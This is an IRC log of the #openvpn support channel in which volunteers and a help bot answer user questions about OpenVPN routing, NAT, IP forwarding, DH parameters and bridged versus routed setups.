[~mezgani@2001:0:53aa:64c:1081:387a:d607:9373] has quit [Ping timeout: 245 seconds] 07:34 -!- p3rror [~mezgani@2001:0:53aa:64c:38c3:387a:d606:6e84] has joined #openvpn 07:39 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 276 seconds] 07:43 -!- JackWinter 
[~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 07:46 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 07:51 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 07:52 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 07:52 -!- p3rror [~mezgani@2001:0:53aa:64c:38c3:387a:d606:6e84] has quit [Ping timeout: 245 seconds] 07:55 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 07:59 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn [] 08:00 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:01 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 08:02 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:05 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn [] 08:06 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:09 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 08:09 -!- p3rror [~mezgani@2001:0:53aa:64c:6a:387a:d607:2e76] has joined #openvpn 08:20 -!- MeanderingCode_ [~Meanderin@71-213-175-106.albq.qwest.net] has quit [Remote host closed the connection] 08:21 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:23 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 08:24 -!- p3rror [~mezgani@2001:0:53aa:64c:6a:387a:d607:2e76] has quit [Ping timeout: 245 seconds] 08:33 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 08:39 -!- p3rror [~mezgani@2001:0:53aa:64c:3070:387a:d606:6f0a] has joined #openvpn 08:40 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:44 -!- MariusIT2 is now known as MariusIT 08:56 -!- p3rror [~mezgani@2001:0:53aa:64c:3070:387a:d606:6f0a] has quit [Ping timeout: 245 seconds] 09:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds] 09:00 -!- xbanux 
[~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has joined #openvpn 09:10 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has joined #openvpn 09:12 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:14 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has quit [Max SendQ exceeded] 09:14 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has joined #openvpn 09:16 -!- MariusIT2 [~userit@86.120.191.55] has joined #openvpn 09:20 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 248 seconds] 09:20 -!- AsadH is now known as zz_AsadH 09:26 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has quit [Ping timeout: 245 seconds] 09:36 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 09:38 -!- nullsign [~nullsign@daedalus.genom.com] has left #openvpn [] 09:38 -!- p3rror [~mezgani@2001:0:53aa:64c:4e6:387a:d607:3a4e] has joined #openvpn 09:44 -!- p3rror [~mezgani@2001:0:53aa:64c:4e6:387a:d607:3a4e] has quit [Ping timeout: 245 seconds] 09:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 09:58 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:02 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has joined #openvpn 10:05 < btjanes> hi, so is there a trick in getting Mountain Lion to honor the DNS settings that are pushed from the server? the resolv.conf has the settings but from what i've read, ML doesn't honor that file 10:06 < btjanes> for now, i'm just adding our lan hosts into my /etc/hosts file 10:06 < btjanes> which is obviously annoying 10:16 -!- ASUchander [~asuchande@cpe-071-070-224-227.nc.res.rr.com] has joined #openvpn 10:17 < ASUchander> Hello if I have a CA with a keylength of 4096, am I required to make my dh parameters 4096 as well? 
10:18 < ASUchander> I'm assuming a larger key length will slow down the initial connection and key negotiation, but then everything else will be relatively the same speed as with a smaller keylength, since it switches to a shared-secret encryption method, right? 10:19 -!- zz_AsadH is now known as AsadH 10:20 < EugeneKay> No, DH doesn't have to match key size 10:20 < EugeneKay> And correct. 10:21 < ASUchander> thanks EugeneKay :-) 10:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:31 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:40 -!- xbanux [~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has quit [Ping timeout: 244 seconds] 10:40 -!- xbanux [~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has joined #openvpn 10:43 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:47 -!- AsadH is now known as zz_AsadH 10:51 -!- raidz_away is now known as raidz 11:05 -!- p3rror [~mezgani@2001:0:53aa:64c:2c17:6329:d606:8bc8] has joined #openvpn 11:15 -!- ngharo [~ngharo@shepard.sypherz.com] has quit [Quit: Reconnecting] 11:15 -!- ngharo [~ngharo@hacked.thegov.us] has joined #openvpn 11:17 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 11:17 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 11:17 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 11:18 -!- p3rror [~mezgani@2001:0:53aa:64c:2c17:6329:d606:8bc8] has quit [Ping timeout: 245 seconds] 11:25 -!- uberushaximus [~uberushax@shepard.sypherz.com] has quit [Quit: Reconnecting] 11:25 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 11:34 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:53 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 11:55 -!- zz_AsadH is now known as AsadH 12:01 -!- 
Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:11 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 12:11 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 12:11 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:11 -!- mode/#openvpn [+o krzee] by ChanServ 12:11 <@krzee> http://www.kittyfeet.com/2013/02/14/jeff-from-liberty-private-network-talks-about-his-secure-bat-phones/ <-- my first interview :D 12:11 <@vpnHelper> Title: » Jeff from Liberty Private Network Talks About His Secure Bat Phones. Anarchy Gumbo Podcast (at www.kittyfeet.com) 12:13 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:16 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 12:17 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:20 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 12:24 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 12:31 -!- jdcaddie [~jdcaddie@unaffiliated/jdcaddie] has joined #openvpn 12:33 < jdcaddie> Does anyone have a moment to answer a couple questions 12:33 <@krzee> !ask 12:33 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 12:33 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 12:33 <@krzee> (yep, vpnHelper knows all) 12:34 < jdcaddie> Is there a way to do a mass import of users from LDAP using OpenVPN Access Server? 
12:35 <@krzee> !as 12:35 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 12:36 <@krzee> community channel supports community version, AS channel supports AS version 12:36 -!- jdcaddie [~jdcaddie@unaffiliated/jdcaddie] has left #openvpn ["Leaving"] 12:37 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has left #openvpn [] 12:37 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has joined #openvpn 12:37 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has left #openvpn [] 12:39 < daemoen> hey guys, what is the *proper* way of adding multiple search paths via push dhcp-option DOMAIN... is it semi colon, new entry for each, space dileneated? 12:39 <@plaisthos> not supported 12:39 <@plaisthos> dhcp itself does not support that 12:39 < daemoen> what about option 119 ? 12:40 <@plaisthos> well that might work but iirc not all client support it and I think there is no openvpn dhcp option for that 12:41 < daemoen> right, ms has a hard time working with dhcp options in general, unless youre binding to AD 12:42 < daemoen> most other oses (linux, bsd, osx) can all support 119, so was curious :) 12:42 <@krzee> http://tools.ietf.org/html/rfc3397#page-2 12:42 <@vpnHelper> Title: RFC 3397 - I-D Tag: (at tools.ietf.org) 12:42 <@plaisthos> feel free to submit patches :) 12:43 <@krzee> =] 12:46 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 12:47 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 13:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 
13:16 -!- matsh [divine@nanogene.org] has joined #openvpn 13:22 -!- dazo is now known as dazo_afk 13:29 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has quit [Changing host] 13:29 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn 13:40 -!- xbanux [~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has quit [Ping timeout: 252 seconds] 13:47 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 13:50 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Quit: Leaving] 13:51 -!- tyteen4a- [tyteen4a03@69.50.229.69] has joined #openvpn 13:52 -!- tyteen4a- is now known as tyteen4a03 14:17 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has joined #openvpn 14:18 < kbarry> I got my openvpn connections working several months ago. They are not working now. I am onsite with my vpn server (on a buffalo router). How might i go about testing the vpn connection without having to go to an alternate location first? 14:19 <@krzee> by looking at the logs 14:19 < kbarry> Anyone here? 14:19 < kbarry> krzee you mind helping me understand my logs? 14:19 <@krzee> !logs 14:19 < kbarry> pastebin? 
14:19 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 14:20 < kbarry> !logs 14:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 14:21 < kbarry> gotta figure out how to make verb set to 5 :) 14:22 <@krzee> you can post what you have for now 14:22 <@krzee> if i need 5 ill tell ya 14:22 <@krzee> but you would do so by putting "verb 5" in your configs 14:23 < kbarry> http://pastebin.com/HZckRdeW 14:23 < kbarry> Thanks for responding. 14:24 < kbarry> vpn/openvpn is a bit mysterious to me. 14:24 <@krzee> are you using the same subnet for --server as the lan you are on? 14:24 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:24 < kbarry> I don't know how to answer that. The router thats acting as the server for the openvpn is also acting as the wireless accesspoint. 14:25 <@krzee> actually i dont know why im asking, i see that you are 14:25 < kbarry> i'm not a network expert by an stretch f the imagination. 14:25 <@krzee> !goal 14:25 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 14:27 < kbarry> I want to do 2 things. #1: Allow remote users (like on a laptop) to access a certain file on our server here at our store. 
(accounting file), and 2, if possible, create a persistant connection between our store and out workshop (20 miles apart). 14:27 <@krzee> between the 2 lans? 14:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:27 <@krzee> those are both very doable 14:27 <@krzee> do you have local access to the server right now? 14:27 < kbarry> in goal 2, To simplify it, if someone get "connected" to the wireless in city A, i want them to also hae access to the file server at location B 14:28 < kbarry> to be clear, there are 2 server, one i will callt he fileserver (With the file i wanna share), 14:28 <@krzee> what devices will openvpn be running on on each side? 14:28 <@krzee> on a server? on routers? 14:28 < kbarry> the other being the openvpn server, and i will call it the "server" 14:29 < kbarry> Goal 1 is more pressing. 14:29 < kbarry> server vpnserver is a router. 14:29 < kbarry> DD-WRT Buffalo WHR-G54S 14:30 < kbarry> its also the accesspoint for this location. 14:30 <@krzee> nice 14:30 <@krzee> that cuts out a step 14:30 <@krzee> how about the client at the other office? 14:30 < kbarry> I used to have the computer i am on connecting from home. 14:30 <@krzee> another vpn router? 14:31 < kbarry> for now, it may be simplier (i dont have another buffalo router) to set the desktops to connect as a service at startup. 14:31 < kbarry> for whatever reason it seemed to stop working, 14:31 < kbarry> never did figure out what was going on, and as i didn't have a great need, i just let it alone till recently. 14:33 < pekster> At the very least "All TAP-Win32 adapters on this system are currently in use." is a problem 14:33 < EugeneKay> There's a shortcut in the start menu to add a second adapter 14:33 < kbarry> hmm, i just noticed one of my "netwokr cars" was diabled. 
14:34 < pekster> EugeneKay, FYI there's a bug in 2.3.0 and it's not in the start menu on Windows unless the user manually extracts tap-windows.exe from the install archive (eg: 7-zip) and re-installs it with the utilities
14:34 < pekster> I sent a report to the mailing list, so hopefully that'll get fixed in the next release
14:34 < EugeneKay> Wow, that sucks.
14:34 < pekster> Indeed
14:34 <@krzee> kbarry, you only need 1 machine on the office lan
14:35 <@krzee> you can route lans over a single vpn connection
14:35 <@krzee> !serverlan
14:35 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
14:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
14:36 < kbarry> :) Thanks, it seems stupid now, but i think that might have been the problem on this computer (the disabled nic)
14:37 <@krzee> looks like bigger problems too tho
14:37 <@krzee> pastebin your server config
14:37 < kbarry> hmm, lemme see if i know how to get that.
14:38 < pekster> EugeneKay: Ah, as of 10h ago a new 2.3.0 (build I004) fixes this
14:39 < kbarry> http://pastebin.com/WKkfqDeV
14:39 < kbarry> my laptop is "connected" now, even while on location.
14:40 <@krzee> oh i see you're on location
14:40 < kbarry> i am now,
14:40 < kbarry> it might not work when offsite.
14:49 < kbarry> krzee what seems to be wrong with our server? You mentioned there might be a bigger problem.
14:49 <@krzee> oh i see
14:49 <@krzee> you're bridging
14:49 <@krzee> may i ask why?
14:49 < kbarry> i was blindly following a tutorial.
14:49 < kbarry> :)
14:49 <@krzee> ahh
14:49 <@krzee> wanna do it the right way?
14:50 < kbarry> Do i EVER!
14:50 <@krzee> you use linux?
14:50 < kbarry> no. It has cooties.
14:51 < kbarry> actually, i respect that its more than i can handle for my needs :)
14:51 < kbarry> i do have it in one of my environments but have someone else who actually knows linux administer it.
14:53 < kbarry> vpn was working on a stationary computer at our other location (its both a home and business lan, and an anti-porn device was installed on the network, and the vpn stopped working from that location.
14:53 < kbarry> its a separate problem all together,
14:53 < kbarry> if there is a "the right way to do it" tutorial, i can probably try it on my own, and get back with y'all here if i run into trouble.
14:54 <@krzee> ok
14:54 < kbarry> btw, what does "bridging" mean?
14:54 <@krzee> !sample
14:54 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
14:54 <@krzee> !tunortap
14:54 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
14:54 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
14:55 <@krzee> !route
14:55 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
14:55 <@krzee> but if you had access to linux, this would be easy:
14:55 <@krzee> !confgen
14:55 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash
14:55 <@krzee> i made a configuration file generator =]
14:55 < kbarry> hmmmmmmmmmm.
14:55 < kbarry> is it a one time use kinda thing
14:56 <@krzee> yep, just makes config files
14:56 < kbarry> meaning, could i use a linux environment for setup, but not need linux after that?
14:56 < kbarry> the linux machine wouldnt be acting as a server or anything?
14:56 <@krzee> it just helps you make your configs
14:56 < kbarry> just setup?
14:57 < kbarry> alright.
14:57 < kbarry> I'm gonna see if i can get a linux environment available.
15:01 < kbarry> crap,
15:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
15:01 < kbarry> the config template you sent me,
15:01 < kbarry> i don't know what the parameters mean, and at the same time, i cant call the man for them.
15:02 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn
15:02 < zhvtar> Hello All
15:02 < rob0> why not?
15:02 < rob0> !man
15:02 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
15:03 < kbarry> Awesome. Thanks.
15:03 < zhvtar> I am looking to set up two separate vpns; can this be done with a single server?
15:03 < kbarry> krzee do you recommend the linked template but with my settings.
15:04 < rob0> zhvtar, you can run as many instances of openvpn as your system can handle (or as many as its administrator can juggle.)
15:04 <@krzee> zhvtar, you can run as many as you want, but each must use its own ip:port:proto
15:04 <@krzee> each with its own config
15:04 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
15:05 <@krzee> kbarry, ignore the sample if using the confgen
15:06 < kbarry> well, as i think on it, getting the confgen working may be a more difficult route.
15:06 <@krzee> ok
15:06 < kbarry> no pun intended.
15:06 < zhvtar> krzee: ip means the private range, not the external isp ip right?
15:07 <@krzee> then start with the sample configs, change the filenames to match yours, then we'll work on the routing
15:07 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 252 seconds]
15:07 <@krzee> both really, but i meant all 3 together, ip:port:protocol
15:08 < kbarry> ok, i'll have to do that later, i'll jump back on later and we'll pick it up from there if you're around. Thanks for the help.
15:08 <@krzee> you can run 1 on udp and 1 on tcp on the same ip:port
15:08 <@krzee> i wont be around
15:08 <@krzee> but cool
15:08 < kbarry> not later today
15:08 < kbarry> later like next week,
15:08 <@krzee> basically what you wanna do is get a routed tun vpn up with routing to the lans
15:08 <@krzee> !route
15:08 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
15:08 <@krzee> is the main stuff you'll want to understand ^
15:08 < kbarry> ok
15:10 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]]
15:10 < zhvtar> currently have them running on two diff machines, using diff ports.
15:13 -!- p3rror [~mezgani@2001:0:53aa:64c:1823:5b24:d606:8bc8] has joined #openvpn
15:13 -!- Ahti333 [~Ahti333@cronosx.de] has left #openvpn ["Textual IRC Client: www.textualapp.com"]
15:15 < zhvtar> !tcpip
15:15 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
15:19 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
15:19 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
15:19 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
15:30 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection]
15:50 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn
15:54 -!- Holiday [~rjr162@128.118.15.39] has quit [Remote host closed the connection]
16:19 -!- Shway [~Shway@216.208.252.66] has quit [Quit: Want to be different? Try HydraIRC -> http://www.hydrairc.com <-]
16:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:31 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has joined #openvpn
16:31 < TechSmurf> Are there any common reasons that OpenVPN will connect successfully but not pass packets?
16:32 < pekster> Firewall, or IP routing in the case of forwarded traffic
16:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds]
16:43 < TechSmurf> guess I couldn't avoid installing wireshark on this laptop forever...
16:45 < TechSmurf> huh
16:45 < TechSmurf> nvm.
16:50 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:50 < TechSmurf> wireshark showed me the obvious... while my pings weren't returning, some random background system dns queries were... firewall it is.
16:51 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
16:53 < TechSmurf> I think tap was breaking it too
16:54 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
16:55 < TechSmurf> yeah, it broke under tap entirely
16:56 < TechSmurf> I had done stuff that would have gotten through the firewall before if tap had connected right... just verified it too. Thanks anyway :)
16:56 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has left #openvpn []
16:59 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
17:00 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn
17:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
17:03 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
17:04 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
17:14 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving]
17:33 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:37 < Kireji> !redirect
17:37 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
17:37 <@vpnHelper> http://ircpimps.org/redirect.png
17:38 < Kireji> !ipforward
17:38 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
17:38 < Kireji> !linipforward
17:38 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
17:42 < Kireji> are there other security concerns I need to understand for "# Uncomment the next line to enable packet forwarding for IPv4
17:42 < Kireji> #net.ipv4.ip_forward=1
17:42 < Kireji> "
17:46 < Kireji> !nat
17:46 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto
17:47 < Kireji> !linnat
17:47 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat
17:49 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
17:54 < Kireji>
17:54 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Read error: Connection reset by peer]
18:05 < Kireji> success! - (sort of)
18:06 < Kireji> I followed the linipforward and linnat instructions, and now the web browser appears to be doing what I expect. when I visit a website in the browser, the connection is tunneled (redirected?) through the openvpn server
18:06 < Kireji> strangely, when I try and ssh, the connection is not tunneled
18:08 < Kireji> how do I tell the kernel to use the tun0 interface when I use the ssh client on the laptop?
18:11 < Kireji> interesting - it's ONLY the route to the openvpn server that is not being tunneled
18:12 < Kireji> weird, that's the one I want tunneled
18:22 < Kireji> hmmm. yeah, connections to the openvpn server (the remote entry in the client config) are not going through the 10.8.0.1 gateway. all the others are. how do I tell tunnelblick to put *ALL* the connections through the tun0 interface?
18:31 < Kireji> yup, there it is, right in the routing table, it adds "0/1 10.8.0.5" on the first line, above the default destination (correct) - and then
18:32 < Kireji> last line of the routing table after tunnelblick is fully connected is "xxx.xxx.247.15/32 192.168.5.1 ... en1" where the xxx address is the remote address
18:35 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit []
18:36 < Kireji> daemoen: kisom: pekster: you guys were super helpful before - maybe if I reference you by name your irc client will ping you?
18:42 -!- p3rror [~mezgani@2001:0:53aa:64c:1823:5b24:d606:8bc8] has quit [Ping timeout: 245 seconds]
18:45 < Kireji> (heh) I think I'm seeing now why the routing table has to have that entry
18:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 244 seconds]
18:48 -!- ASUchander [~asuchande@cpe-071-070-224-227.nc.res.rr.com] has quit [Remote host closed the connection]
19:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
19:04 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 245 seconds]
19:04 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn
19:07 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in]
19:08 -!- raidz is now known as raidz_away
19:11 < Kireji> I just have to refer to the openvpn server with its 10.8 address, and it's all good!
19:15 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 264 seconds]
19:16 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
19:40 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds]
19:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
20:19 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
20:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
20:41 -!- James_Epp [~derp@216.36.170.104] has joined #openvpn
20:41 < James_Epp> I am working in PfSense and really buggered up my configuration. How do I reset all of the settings? #pfsense is quiet.
20:42 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
20:42 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
20:42 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
20:42 -!- mode/#openvpn [+o krzee] by ChanServ
20:43 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection]
20:44 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
20:44 -!- mode/#openvpn [+o krzee] by ChanServ
20:45 * EugeneKay gives pants to krzee
20:46 <@krzee> nopants!
